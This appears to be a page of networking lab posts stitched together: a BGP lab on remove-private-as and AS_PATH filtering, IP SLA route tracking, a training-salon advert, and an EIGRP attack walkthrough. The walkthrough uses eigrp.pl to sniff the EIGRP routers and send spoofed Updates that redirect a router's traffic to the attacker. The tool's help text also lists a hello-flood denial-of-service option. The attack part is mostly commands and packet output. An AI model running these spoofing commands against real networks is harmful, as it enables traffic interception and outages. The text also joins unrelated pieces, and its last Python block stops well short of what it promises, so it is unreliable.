Everyone knows that when the next hop of a static route goes down, the static route disappears from the routing table. If a link further along the path (one that is not directly connected) goes down, however, the route normally stays in the local routing table. With IP SLA the router can detect that a non-directly-connected destination has become unreachable and withdraw the static route.
R1 (12.1.1.1) ---------- (12.1.1.2) R2 (23.1.1.2) ---------- (23.1.1.3) R3
ip sla monitor 123
type echo protocol ipIcmpEcho 23.1.1.3 source-ipaddr 12.1.1.1
frequency 10
ip sla monitor schedule 123 life forever start-time now
track 1 rtr 123 reachability
ip route 23.1.1.0 255.255.255.0 12.1.1.2 track 1
ip route 23.1.1.0 255.255.255.0 12.1.1.2
Shut down R3's interface and check the result on R1 with show ip route (show track 1 shows whether the tracked object is up or down).
Original post by kinglab, reposted with modifications.
Network topology diagram:
Learning Objective
In this lab, you will use BGP commands to prevent private AS numbers from
being advertised to the outside world. You will also use the AS_PATH attribute to
filter BGP routes based on their source AS numbers.
Scenario
The International Travel Agency's ISP has been assigned an AS number of 300.
This provider uses BGP to exchange routing information with several customer
networks. Each customer network is assigned an AS number from the private
range, such as AS 65000. Configure ISP to remove the private AS numbers
within the AS_Path information from CustRtr. In addition, the ISP would like to
prevent its customer networks from receiving route information from International
Travel Agency's AS 100. Use the AS_PATH attribute to implement this policy.
Step 1: IP Addressing
Build and configure the network according to the diagram, but do not configure a
routing protocol.
Use ping to test the connectivity between the directly connected routers. Note
that SanJose cannot reach the customer network behind CustRtr: it can reach
neither the IP address of the link leading to CustRtr nor the loopback
interface 202.0.0.1/24, because no routing protocol is running yet.
Step 2: Configure BGP
Configure BGP for normal operation. Enter the appropriate BGP commands on
each router so that they identify their BGP neighbors and advertise their
loopback networks:
SanJose(config)#router bgp 100
SanJose(config-router)#neighbor 192.168.1.6 remote-as 300
SanJose(config-router)#network 201.0.0.0
ISP(config)#router bgp 300
ISP(config-router)#neighbor 192.168.1.5 remote-as 100
ISP(config-router)#neighbor 172.24.1.18 remote-as 65000
ISP(config-router)#network 202.0.0.0
CustRtr(config)#router bgp 65000
CustRtr(config-router)#neighbor 172.24.1.17 remote-as 300
CustRtr(config-router)#network 203.0.0.0
Verify that these routers have established the appropriate neighbor relationships
by issuing the show ip bgp neighbors command on each router.
Step 3: Remove the Private AS
Check SanJose's routing table by using the show ip route command. SanJose
should have a route to both 202.0.0.0 and 203.0.0.0. Troubleshoot, if necessary.
Ping the 203.0.0.1 address from SanJose. Why does this fail?
Ping again, this time as an extended ping, sourcing from the Loopback 0
interface as follows:
SanJose#ping
Protocol [ip]:
Target IP address: 203.0.0.1
Repeat count [5]:
Datagram size [100]:
Timeout in seconds [2]:
Extended commands [n]: y
Source address or interface: 201.0.0.1
Type of service [0]:
Set DF bit in IP header? [no]:
Validate reply data? [no]:
Data pattern [0xABCD]:
Loose, Strict, Record, Timestamp, Verbose[none]:
Sweep range of sizes [n]:
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 203.0.0.1, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 64/64/68 ms
Check the BGP table from SanJose by using the show ip bgp command. Note
the AS path for the 203.0.0.0 network. The AS 65000 should be listed in the path
to 203.0.0.0. Why is this a problem?
BGP table version is 4, local router ID is 201.0.0.1
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal
Origin codes: i - IGP, e - EGP, ? - incomplete
Network Next Hop Metric LocPrf Weight Path
*> 201.0.0.0 0.0.0.0 0 32768 i
*> 202.0.0.0 192.168.1.6 0 0 300 i
*> 203.0.0.0 192.168.1.6 0 300 65000 i
Configure ISP to strip the private AS numbers from BGP routes exchanged with
SanJose. Use the following commands:
ISP(config)#router bgp 300
ISP(config-router)#neighbor 192.168.1.5 remove-private-as
After issuing these commands, use the clear ip bgp * command on SanJose to
reestablish the BGP relationship between the three routers.
Wait several seconds, and then return to SanJose to check its routing table.
Does SanJose still have a route to 203.0.0.0?
SanJose should now be able to ping 203.0.0.1 when sourcing from Loopback 0, as before.
Now check the BGP table on SanJose. The AS_PATH to the 203.0.0.0 network
should be AS 300.
BGP table version is 8, local router ID is 201.0.0.1
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal
Origin codes: i - IGP, e - EGP, ? - incomplete
Network Next Hop Metric LocPrf Weight Path
*> 201.0.0.0 0.0.0.0 0 32768 i
*> 202.0.0.0 192.168.1.6 0 0 300 i
*> 203.0.0.0 192.168.1.6 0 300 i
Step 4: Use the AS_PATH Attribute to Filter Routes
As a final configuration, use the AS_PATH attribute to filter routes based on their
origin. In a complex environment, this attribute can be used to enforce routing
policy. In this case, the provider router, ISP, must be configured so that it does
not propagate routes that originate from AS 100 to the customer router, CustRtr.
First, configure a special kind of access list to match BGP routes with an
AS_PATH attribute that both begins and ends with the number 100. Enter the
following commands on ISP:
ISP(config)#ip as-path access-list 1 deny ^100$
ISP(config)#ip as-path access-list 1 permit .*
AS-path access lists are read like regular access lists, in that they are read
through in order and have an implicit deny at the end. Rather than matching an
address in each statement, like a conventional access-list, they match on
something called regular expressions. Regular expressions are a way of
matching text patterns, and have many uses. In this case we use them in the
AS-path access list to match text patterns in AS paths.
The first command above uses the ^ character to indicate that the AS_PATH
must begin with the given number 100. The $ character indicates that the
AS_PATH attribute must also end with 100. Essentially, this statement matches
only paths that are sourced from AS 100. Other paths, which might include AS
100 along the way, will not match this list.
In the second statement, the . character is a wildcard, and the * symbol stands
for a repetition of the wildcard. Together, .* matches any value of the AS_PATH
attribute, which in effect permits any update that has not been denied by the
previous access-list statement.
For more details on configuring regular expressions on Cisco routers, see the
Cisco IOS documentation.
Now that the access list has been configured, apply it as follows:
ISP(config)#router bgp 300
ISP(config-router)#neighbor 172.24.1.18 filter-list 1 out
The out keyword specifies that the list is applied to routing information sent to
this neighbor.
Use the clear ip bgp * command to reset the routing information. Wait several
seconds, and then check the routing table for ISP. The route to 201.0.0.0 should
be in the routing table.
Check the routing table for CustRtr. It should not have a route to 201.0.0.0 in its
routing table.
Return to ISP and verify that the filter is working as intended. Issue the command
show ip bgp regexp ^100$.
The output of this command shows all matches for the regular expressions that
were used in the access list. The path to 201.0.0.0 matches the access list and is
filtered from updates to CustRtr.
ISP#show ip bgp regexp ^100$
BGP table version is 4, local router ID is 202.0.0.1
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal
Origin codes: i - IGP, e - EGP, ? - incomplete
Network Next Hop Metric LocPrf Weight Path
*> 201.0.0.0 192.168.1.5 0 0 100 i
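The two outbound policies the lab configures on ISP in Steps 3 and 4, modelled in Python so they can be checked away from the router. This is an added example, not code from the lab manual and not how IOS implements it. The BGP table is constructed from the show ip bgp output above, the neighbour and access-list names are this example's own, and two IOS behaviours are assumed as Cisco documents them: the classic remove-private-as (without the all keyword) strips private ASNs only from a path made entirely of private ASNs, and an as-path access-list is walked in order, first match wins, with an implicit deny at the end, IOS's _ standing for a path separator.

```python
"""AS_PATH policy from the ISP lab, modelled in plain Python.

Added example, not from the lab manual and not Cisco's implementation.  It models
the two outbound policies Steps 3 and 4 configure on ISP:
  * `neighbor 192.168.1.5 remove-private-as` toward SanJose (classic form: strip
    private ASNs only when the whole path is private; leave a mixed path alone);
  * `neighbor 172.24.1.18 filter-list 1 out` toward CustRtr (entries evaluated in
    order, first match wins, implicit deny; `_` is IOS's path-separator token).
ISP_BGP_TABLE is constructed from the lab's `show ip bgp` output.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Sequence, Tuple

LOCAL_AS = 300
PRIVATE_ASN_RANGES = ((64512, 65534), (4200000000, 4294967294))  # RFC 6996

# prefix -> AS_PATH as ISP received it, before prepending its own AS 300.
ISP_BGP_TABLE: Dict[str, List[int]] = {
    "201.0.0.0/24": [100],    # from SanJose, AS 100
    "202.0.0.0/24": [],       # ISP's own loopback, locally originated
    "203.0.0.0/24": [65000],  # from CustRtr, private AS 65000
}


def is_private_asn(asn: int) -> bool:
    return any(lo <= asn <= hi for lo, hi in PRIVATE_ASN_RANGES)


def remove_private_as(as_path: Sequence[int]) -> List[int]:
    """Classic `remove-private-as`: an all-private path is emptied, a path that mixes
    public and private ASNs is sent unchanged (the `all` keyword would strip those too)."""
    if as_path and all(is_private_asn(a) for a in as_path):
        return []
    return list(as_path)


def ios_regex(pattern: str) -> "re.Pattern[str]":
    """IOS AS-path regex -> Python: `_` matches a separator (start, end, space,
    comma, braces, parentheses); ^ $ . * mean the same in both."""
    return re.compile(pattern.replace("_", r"(?:^|$|[\s,{}()])"))


class AsPathAccessList:
    """`ip as-path access-list N {permit|deny} REGEX`, one (action, regex) per entry."""

    def __init__(self, entries: Sequence[Tuple[str, str]]):
        self.entries = [(action, ios_regex(rx)) for action, rx in entries]

    def permits(self, as_path: Sequence[int]) -> bool:
        text = " ".join(str(a) for a in as_path)   # how the router renders the path
        for action, rx in self.entries:
            if rx.search(text):
                return action == "permit"
        return False  # implicit deny at the end of the list


@dataclass
class Neighbor:
    name: str
    remote_as: int
    filter_list_out: Optional[AsPathAccessList] = None
    remove_private_as: bool = False


def outbound_updates(table: Dict[str, List[int]], nbr: Neighbor,
                     local_as: int = LOCAL_AS) -> Dict[str, List[int]]:
    """AS_PATHs ISP sends to `nbr`: outbound filter-list on the stored path, then
    remove-private-as on that path, then the local AS prepended."""
    sent: Dict[str, List[int]] = {}
    for prefix, path in table.items():
        if nbr.filter_list_out is not None and not nbr.filter_list_out.permits(path):
            continue  # denied: never advertised to this neighbour
        path_out = remove_private_as(path) if nbr.remove_private_as else list(path)
        sent[prefix] = [local_as] + path_out
    return sent


# The two neighbours as the lab configures them on ISP.
SANJOSE = Neighbor("SanJose", 100, remove_private_as=True)
CUSTRTR = Neighbor("CustRtr", 65000,
                   filter_list_out=AsPathAccessList([("deny", "^100$"), ("permit", ".*")]))

if __name__ == "__main__":
    for n in (SANJOSE, CUSTRTR):
        for prefix, path in sorted(outbound_updates(ISP_BGP_TABLE, n).items()):
            print("%s <- %s  path %s" % (n.name, prefix, " ".join(map(str, path))))
```

Running it prints what ISP advertises to each neighbour: 203.0.0.0 reaches SanJose with path 300 alone, as the second BGP table above shows, and 201.0.0.0 is absent from the CustRtr feed because ^100$ matches its stored path before 300 is prepended, which is also why show ip bgp regexp ^100$ on ISP lists exactly that route.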
Everything above is from the lab manual.
Having done this lab, I learned a few things:
1. remove-private-as can be used to strip (hide) private AS numbers.
2. To filter on AS_PATH you first define an as-path access-list: ip as-path access-list number(1-500) {deny|permit} regular-expression.
3. Then apply it to the neighbour and you are done.
Download of the simulator .net file and configurations:
Knowledge is power: 无忧网客联盟 (net527) online technical salon
Knowledge is power. 无忧网客联盟, together with Beijing wolf lab, Beijing cj-club, Xi'an 时代教育, Zhejiang 博学教育 and other established training companies, presents a series of technical courses. Members can discuss and exchange ideas with the many instructors face to face.
All sessions take place in the Cisco lecture hall; the hall number and the key for the PPT system are given below.
For the evening salon the voice test starts early at 19:30 and the desktop test 10 minutes before the start. Half an hour after the session begins the meeting system is locked, and accounts other than the green channel can no longer enter the voice system, so that the instructor is not disturbed. Thank you all for your support! The morning sessions follow the same procedure.
net527 super technical salon QQ group: 35744555
Online technical salon, phase 1
Date | Time | Course | Instructor | Training company | Notes
Oct 19 | 20:00-22:00 | MPLS/VPN architecture | Calvin.Cai | 陕西时代教育 | R&S and ISP dual CCIE
Oct 22 | 20:00-22:00 | MPLS TE traffic engineering | Calvin.Cai | 陕西时代教育 | R&S and ISP dual CCIE
Oct 23 | 20:00-22:00 | AToM/VPLS Layer 2 MPLS VPN | Calvin.Cai | 陕西时代教育 | R&S and ISP dual CCIE
Oct 24 | 09:00-11:00 | Building an SSL VPN on the ASA firewall | 秦柯 | wolf lab | head of WOLF security (明教教主)
Oct 25 | 09:00-11:00 | Group Encrypted Transport VPN on IOS | 秦柯 | wolf | head of WOLF security (明教教主)
ispeak room number
无忧网客联盟 Cisco hall: 248169
Path into the PPT system:
http://meeting.zoho.com/login/enterdetails.jsp?invalid=true&email=null&name=null
Course | PPT share ID
MPLS/VPN architecture | 161 795 8170
MPLS TE traffic engineering | 264 071 4530
AToM/VPLS Layer 2 MPLS VPN | 384 559 8730
Building an SSL VPN on the ASA firewall | 600 462 4520
Group Encrypted Transport VPN on IOS | 762 013 2860
Please refer to the schedule above for the exact times and instructors.
If you do not know how to join the meeting, see this post:
http://bbs.net527.cn/thread-15673-1-1.html
We are running EIGRP as the dynamic routing protocol and it has converged.
This experiment uses a Perl script tool; the files can be downloaded from the attachment. As before, Ubuntu is the attack platform.
Get eigrp-tools.pl and unpack it into any directory; the contents are very simple:
-rwxrwxrwx 1 sc sc 1120 2005-12-19 06:58 eigrp.conf
-rwxrwxrwx 1 sc sc 36259 2005-12-19 06:58 eigrp.pl
-rwxrwxrwx 1 sc sc 1004 2005-12-19 07:00 MINI-README
To explain: the .pl is the main attack script; the .conf exists for convenience, so that parameters can be preset in a config file and are read from there whenever they are not given on the pl command line.
Part 1: Checking the Perl environment
When you get hold of a script or some source, never expect it to work first time; start by seeing what is missing.
root@sc-desktop:~/eigrp-tools# perl eigrp.pl
Can't locate Net/RawIp.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.0 /usr/local/share/perl/5.10.0 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at eigrp.pl line 9.
BEGIN failed--compilation aborted at eigrp.pl line 9.
A word on approach: for foreign matters ask Google, for domestic ones ask Gougou (狗狗); this is a foreign matter, so we ask Google.
Almost any question (other than what your future wife's name will be, although plenty of fortune-telling sites seem to cover that too) has an answer out there, so it is true that the road is found by asking; the key is how you search. In my view a recursive search is the most effective, and this case shows it.
No pretence: I am Perl-illiterate too. In this experiment I only want to use the script for a network attack test, not to study Perl itself, so focus on the main problem.
1. First search for the exact phrase "Can't locate Net/RawIp.pm in" to see whether there is a direct fix. The results are fragmentary: others ask the same question, and the answers all amount to "install the module".
2. Change direction and search for "perl install module". Now there is plenty, with detailed tutorials. We do not read a whole tutorial, just look for a relevant example in the results. I found one a few sentences long that mentioned cpan.
3. Try cpan in bash straight away. You get a cpan[1]> prompt; intuitively this is some kind of mode interface like mysql>. Type help and install shows up.
4. Try immediately:
cpan[5]> install rawip
Warning: Cannot install rawip, don't know what it is.
Try the command
i /rawip/
to find objects with matching identifiers.
5. Good: it does not understand what I want, but it gives a hint; clearly it does not know that name, so do as it says:
cpan[6]> i /rawip/
Distribution SAPER/Net-RawIP-0.25.tar.gz
Module Net::RawIP (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::ethhdr (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::generichdr (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::icmphdr (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::iphdr (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::opt (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::tcphdr (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::udphdr (SAPER/Net-RawIP-0.25.tar.gz)
9 items found
6. So I had not followed the local customs; do as the host does:
cpan[7]> install Net::RawIP
Running install for module 'Net::RawIP'
CPAN: Data::Dumper loaded ok (v2.121_14)
'YAML' not installed, falling back to Data::Dumper and Storable to read prefs '/root/.cpan/prefs'
Running make for S/SA/SAPER/Net-RawIP-0.25.tar.gz
CPAN: LWP::UserAgent loaded ok (v5.810)
I would like to connect to one of the following sites to get 'authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz':
http://www.perl.org/CPAN/
ftp://ftp.perl.org/pub/CPAN/
Is it OK to try to connect to the Internet? [yes]
Fetching with LWP:
http://www.perl.org/CPAN/authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz
CPAN: Digest::SHA loaded ok (v5.45)
Checksum for /root/.cpan/sources/authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz ok
Scanning cache /root/.cpan/build for sizes
.............................(omitted).............................
CPAN: File::Temp loaded ok (v0.18)
Warning (usually harmless): 'YAML' not installed, will not store persistent state
CPAN.pm: Going to build S/SA/SAPER/Net-RawIP-0.25.tar.gz
Compiler: cc
cc (Ubuntu 4.3.2-1ubuntu11) 4.3.2
Copyright (C) 2008 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Could not load the pcap library. Please see the README file on how
to install it. Be sure to also install the C headers (pcap.h).
Warning: No success on command[/usr/bin/perl Makefile.PL INSTALLDIRS=site]
Warning (usually harmless): 'YAML' not installed, will not store persistent state
SAPER/Net-RawIP-0.25.tar.gz
/usr/bin/perl Makefile.PL INSTALLDIRS=site -- NOT OK
Running make test
Make had some problems, won't test
Running make install
Make had some problems, won't install
Could not read '/root/.cpan/build/Net-RawIP-0.25-Yx2FXb/META.yml'. Falling back to other methods to determine prerequisites
Failed during this command:
SAPER/Net-RawIP-0.25.tar.gz : writemakefile NO '/usr/bin/perl Makefile.PL INSTALLDIRS=site' returned status 512
The install failed, but it told us what is wrong: YAML is not installed, and pcap.h is missing. Intuitively the latter is a system package.
7. Fix YAML first:
cpan[11]> install YAML
Running install for module 'YAML'
'YAML' not installed, falling back to Data::Dumper and Storable to read prefs '/root/.cpan/prefs'
Running make for I/IN/INGY/YAML-0.68.tar.gz
Fetching with LWP:
http://www.perl.org/CPAN/authors/id/I/IN/INGY/YAML-0.68.tar.gz
Fetching with LWP:
http://www.perl.org/CPAN/authors/id/I/IN/INGY/CHECKSUMS
Checksum for /root/.cpan/sources/authors/id/I/IN/INGY/YAML-0.68.tar.gz ok
............................................................................DONE
Found 1 old build, restored the state of 1
Installed cleanly.
8. Next search for pcap.h: you need the libpcap dev package. There is a shortcut here: we have already downloaded "/root/.cpan/sources/authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz", and the README inside it also mentions the pcap.h requirement. apt-get install libpcap0.8-dev does it.
9. This time install Net::RawIP succeeds. Running the eigrp script again complains that NetPacket/Ethernet.pm is missing; look it up the same way and install it, and everything completes.
Solving problems this way is quick, but the drawback is obvious: you end up without a coherent body of knowledge and no real picture of Perl.
Now the environment is ready. Have a look at the script's extensive parameters:
root@sc-desktop:~/eigrp-tools# perl eigrp.pl
Using config file eigrp.conf...
eigrp.pl, , V 0.1
This program was originally created for the book "Hacking Exposed: Cisco Networks"
Authors Janis Vizulis, Arhont Ltd. (License GPL-2 ) Please send bugs and comments
to info[dot]arhont.com
usage: eigrp.pl [--sniff] [ --iface=inteterface ] [--timeout=i]
Options:
--sniff Sniff eigrp packets
--iface Listen on an interface
--iflist List all available network interfaces
--source Source IP address
--dest Packet destination IP. Default multicast IP - 224.0.0.10
--timeout=n pcap init timeout (500 default)
--hello Send EIGRP HELLO
--update Update route
--query Send [Query] (Unreachable destination )
--external External route
--internal Internal route
--ipgoodbye=s IP to [Goodbye message] Authentification replay not implemented
--file2ip=s Send raw sniffed eigrp data from file to IP
--payback Sniff the UPDATE packet, change [Delay] and send it back (PoC)
--op=n EIGRP opcode number to trigger, capture a packet defined by the trigger to a disk
--sn=n EIGRP sequence number to trigger
--auth Authentication data for the reply atack (copy past hex from sniff)
--opcode Custom opcode for hello packets fuzzing
--flags=n EIGRP flags (0,1 or 2)
--version=n EIGRP version [8 bit integer] Default = 2
--as=n Autonomous system number, Default = 1
--k1=n Metric K1 Default 1
--k2=n Mertic K2 Default 0
--k3=n Mertic K3 Default 1
--k4=n Mertic K4 Default 0
--k5=n Mertic K4 Default 0
--mtu=n MTU
--nms=n Add NMS (Next multicast message) to Hello packet
--eigrpv=s EIGRP release version
--ios=s IOS version
--hopcount=n Hop count
--reliability=n Reliability
--load=n Load
--delay=n Delay
--sequence=n Sequence (32bit sequence) Default = 0
--ack=n Acknowledge (32bit sequence) Default = 0
--nexthop=s Next Hop
--bandwidth=n Bandwidth
--routedest=s Route destination
--origrouter=s Originating router
--origas=n Originating Autonomous system number
--arbitatag=n Arbitrary tag
--metric=n protocol metric (external EIGRP metric for the external updates)
--extproto=n External protocol ID IGRP(1) EIGRP(2) Static Route(3) RIP(4)
HELLO(5) OSPF(6) IS_IS(7) EGP(8) BGP(9) IDRP(10) Connected link(11)
--hold=n Hold time in seconds
--hellotime=n Hello send retries timeout. Default = 5 sec
--hellodos=s IP subnet. Warning! Nasty DOS atack ! Send HELLO EIGRP Argument from IP range.
--retries=n Packet send retries Default = 1;
Example :
./eigrp.pl --sniff --iface eth0
./eigrp.pl --ipgoodbye 192.168.66.202 --source 192.168.7.8
./eigrp.pl --file2ip update.dat --source 192.168.7.8
./eigrp.pl --update --external --as 65534 --source 192.168.7.8
./eigrp.pl --hello --auth 00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52
--source 192.168.77.8 --nms 1
./eigrp.pl --help This message
root@sc-desktop:~/eigrp-tools#
Part 2: Probing the surroundings
Use the script's sniffing function to look at the environment; in unfamiliar surroundings this is a way to learn the topology.
root@sc-desktop:~/eigrp-tools# ./eigrp.pl --sniff --iface eth0
Using config file eigrp.conf…
./eigrp.pl, , V 0.1
Use of uninitialized value in subroutine entry at /usr/local/lib/perl/5.10.0/Net/RawIP.pm line 640.
Link Offset: 14..
Sniffing interface: eth0
***************************************************************
Source MAC:c2040d400000 Dest MAC:01005e00000a
Source IP: 192.168.1.249 Dest IP:224.0.0.10
****************************************************************
HexDump (high nybble first):
02 05 ee cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 0c 01
00 01 00 00 00 00 0f 00 04 00 08 0c 04 01 02
Version: 2
Opcode:05 <Hello/Ack>
Checksum: 0xeecb <* Correct *>
Flags: 0 Sequnce :0
Acknowledge: 0
Autonomus system number: 1
<<<EIGRP Parameters: 0001 >>>
Size: 12
K1: 1 K2: 0 K3: 1 K4: 0 K5: 0,
Reserved: 0 Hold Time: 15
<<<Software Version 0004 >>>
Size: 8
IOS version: 12.4
EIGRP version 1.2
***************************************************************
Source MAC:c2030d400000 Dest MAC:01005e00000a
Source IP: 192.168.1.251 Dest IP:224.0.0.10
****************************************************************
HexDump (high nybble first):
02 05 ee cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 0c 01
00 01 00 00 00 00 0f 00 04 00 08 0c 04 01 02
Version: 2
Opcode:05 <Hello/Ack>
Checksum: 0xeecb <* Correct *>
Flags: 0 Sequnce :0
Acknowledge: 0
Autonomus system number: 1
<<<EIGRP Parameters: 0001 >>>
Size: 12
K1: 1 K2: 0 K3: 1 K4: 0 K5: 0,
Reserved: 0 Hold Time: 15
<<<Software Version 0004 >>>
Size: 8
IOS version: 12.4
EIGRP version 1.2
We can see the two EIGRP routers on the network, their EIGRP version and their IOS version.
Note by 水煮豆豆: a word on the K values, which many who have studied EIGRP never quite understand. Cisco went to great lengths to design five of them and then advises users not to change them. Simply put, the K values exist as an expert-level parameter set that gives more flexibility in network design: adjusting the five lets you choose between delay and stability, that is, whether you want a more stable network or a lower-delay one. That is all there is to it.
Now both the attacker and the routers under attack are ready, and the experiment can begin.
Part 3: Injecting a malicious route
First recall a property of EIGRP. To minimise the bandwidth that routing takes up, the DUAL design does not periodically re-advertise its whole routing table; it uses triggered updates, advertising only what changed when the local routing table changes. In other words, as long as the neighbour's hellos keep the adjacency alive, our R0 will hold on to the malicious route the attacker pushed into it, until R1's hellos fail and the adjacency is renegotiated.
1. First the routing tables on both routers under normal conditions:
R0#sh ip route
Gateway of last resort is not set
D 172.16.0.0/16 [90/307200] via 192.168.1.249, 20:55:19, FastEthernet0/0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
R1#sh ip route
Gateway of last resort is not set
172.16.0.0/16 is variably subnetted, 2 subnets, 2 masks
C 172.16.0.0/24 is directly connected, FastEthernet0/1
D 172.16.0.0/16 is a summary, 21:14:43, Null0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
R0收到R1的一条通告,因为R1上有直连的172.16网络。
2、接下来攻击方发送恶意路由信息:
./eigrp.pl --update --internal --source 192.168.1.249 --routedest 172.16.0.0/16 --nexthop 192.168.1.36
Here update means send an update, internal means the injected route is marked as EIGRP-internal, source spoofs the router sending the update, routedest is the route to inject and nexthop is its next-hop address.
Note by 水煮豆豆: one thing to watch out for: the RawIP.pm in the attacker's Perl environment has a strict network address check. If the host address and the gateway are not within the same mask, or there is no gateway, you get the following error:
First, the effect:
Sniffing the malicious route data as it is sent:
***************************************************************
Source MAC:000c29c57e29 Dest MAC:01005e00000a
Source IP: 192.168.1.249 Dest IP:224.0.0.10
****************************************************************
HexDump (high nybble first):
02 01 01 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 02 00 1c c0
a8 01 24 00 00 2e e0 00 00 01 00 00 05 ea 01 ff 01 00 00 10 ac 10 00
Version: 2
Opcode:01 <Update>
Checksum: 0x17e <* Correct *>
Flags: 0 Sequnce :0
Acknowledge: 0
Autonomus system number: 1
<<<IP internal route: 0102 >>>
Size: 28
Next hop: 192.168.1.36
Delay: 12000 Bandwidth: 256
MTU: 1514 Hop count: 1
Reliability:255 Load: 1
Reserved 0
Prefix Length: 16
Destination: 172.16.0.
What was sent is an EIGRP Update packet.
Then check router R0:
R0#sh ip route
Gateway of last resort is 192.168.1.36 to network 0.0.0.0
D 172.16.0.0/16 [90/293600] via 192.168.1.36, 00:00:17, FastEthernet0/0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
D* 0.0.0.0/0 [90/319200] via 192.168.1.36, 00:00:17, FastEthernet0/0
The route that pointed to .249 now points to .36, i.e. to the attacker: R0 now sends its traffic for 172.16 to us.
As long as the .249 neighbour stays up, R0 keeps this route until that neighbour fails.
Now the question: we injected an internal route, so why has a default route pointing to .36 appeared?
Further investigation: why was a default route inserted as well? Compare with the normal update coming from R1:
***************************************************************
Source MAC:c2040d400000 Dest MAC:01005e00000a
Source IP: 192.168.1.249 Dest IP:224.0.0.10
****************************************************************
HexDump (high nybble first):
02 01 b4 ac 00 00 00 0a 00 00 00 72 00 00 00 00 00 00 00 01 01 02 00 1b 00
00 00 00 00 00 64 00 00 03 e8 00 00 05 dc 00 ff 01 00 00 10 ac 10
Version: 2
Opcode:01 <Update>
Checksum: 0xb4ac <* Correct *>
Flags: 10 Sequnce :114
Acknowledge: 0
Autonomus system number: 1
<<<IP internal route: 0102 >>>
Size: 27
Next hop: 0.0.0.0
Delay: 25600 Bandwidth: 256000
MTU: 1500 Hop count: 0
Reliability:255 Load: 1
Reserved 0
Prefix Length: 16
Destination: 172.16..
The most visible difference between the normal update and our forged one is the next hop (the TLV size, 27 versus 28 bytes, and the metric fields also differ). So why does the normal update not install a default route while the forged one does? Change the forged nexthop as well:
./eigrp.pl --update --internal --source 192.168.1.249 --routedest 172.16.0.0/16 --nexthop 0.0.0.0
With the nexthop parameter changed, the result becomes:
D 172.16.0.0/16 [90/293600] via 192.168.1.249, 00:00:02, FastEthernet0/0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
D* 0.0.0.0/0 [90/319200] via 192.168.1.249, 00:00:02, FastEthernet0/0
The default route is still there, but its source changed from .36 to .249. Comparing 0.0.0.0, 192.168.1.36 and 192.168.1.249, is the router by default choosing the highest of the three addresses? That remains a guess.
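The three sniffer dumps above (the router's Hello, the forged Update and R1's genuine Update) decoded and rebuilt in Python, as an added example rather than code from the page or from eigrp.pl. It recomputes the EIGRP checksum that the sniffer reports as Correct, walks the TLVs by the RFC 7868 layout, reproduces the injected Update byte for byte from its field values, and builds the K=255 goodbye Hello that the later sections discuss. It also makes one encoding detail behind the default-route question visible: the IPv4 internal route TLV carries one metric followed by as many (prefix length, prefix) pairs as its length allows, a prefix taking ceil(length/8) bytes. R1's TLV is 27 bytes and ends with 10 ac 10, while the forged one is 28 bytes and ends with 10 ac 10 00, so decoded by that rule its trailing 0x00 is a second destination of prefix length 0, i.e. 0.0.0.0/0. Whether IOS decodes it the same way is not established by the page (the two routes in R0's table do not even share a metric), so this is an observation about the bytes, not a claimed cause. Field and function names are this example's own.

```python
"""EIGRP decoder and Update builder for the sniffer dumps on this page.

Added example, not the page's code and not part of eigrp.pl.  The hex strings are
copied from the dumps above; header and IPv4 Internal Route TLV follow RFC 7868, the
checksum is the ones-complement sum over the packet with its checksum field zeroed.
"""
import struct
from collections import namedtuple
from typing import Any, Dict, Optional

HELLO_HEX = ("02 05 ee cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 0c 01 "
             "00 01 00 00 00 00 0f 00 04 00 08 0c 04 01 02")
FORGED_UPDATE_HEX = ("02 01 01 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 02 00 1c c0 "
                     "a8 01 24 00 00 2e e0 00 00 01 00 00 05 ea 01 ff 01 00 00 10 ac 10 00")
R1_UPDATE_HEX = ("02 01 b4 ac 00 00 00 0a 00 00 00 72 00 00 00 00 00 00 00 01 01 02 00 1b 00 "
                 "00 00 00 00 00 64 00 00 03 e8 00 00 05 dc 00 ff 01 00 00 10 ac 10")
TLV_PARAMETERS, TLV_SOFTWARE_VERSION, TLV_IPV4_INTERNAL = 0x0001, 0x0004, 0x0102
OPCODE_UPDATE, OPCODE_HELLO = 1, 5  # RFC 7868 opcodes (Hello is 5, as the captures show)
EigrpPacket = namedtuple("EigrpPacket", "version opcode checksum checksum_ok flags seq ack asn tlvs")


def eigrp_checksum(pkt: bytes) -> int:
    """Ones-complement sum of 16-bit words, checksum field taken as zero,
    odd length padded with one zero byte (R1's Update is 47 bytes)."""
    data = pkt[:2] + b"\x00\x00" + pkt[4:]
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF
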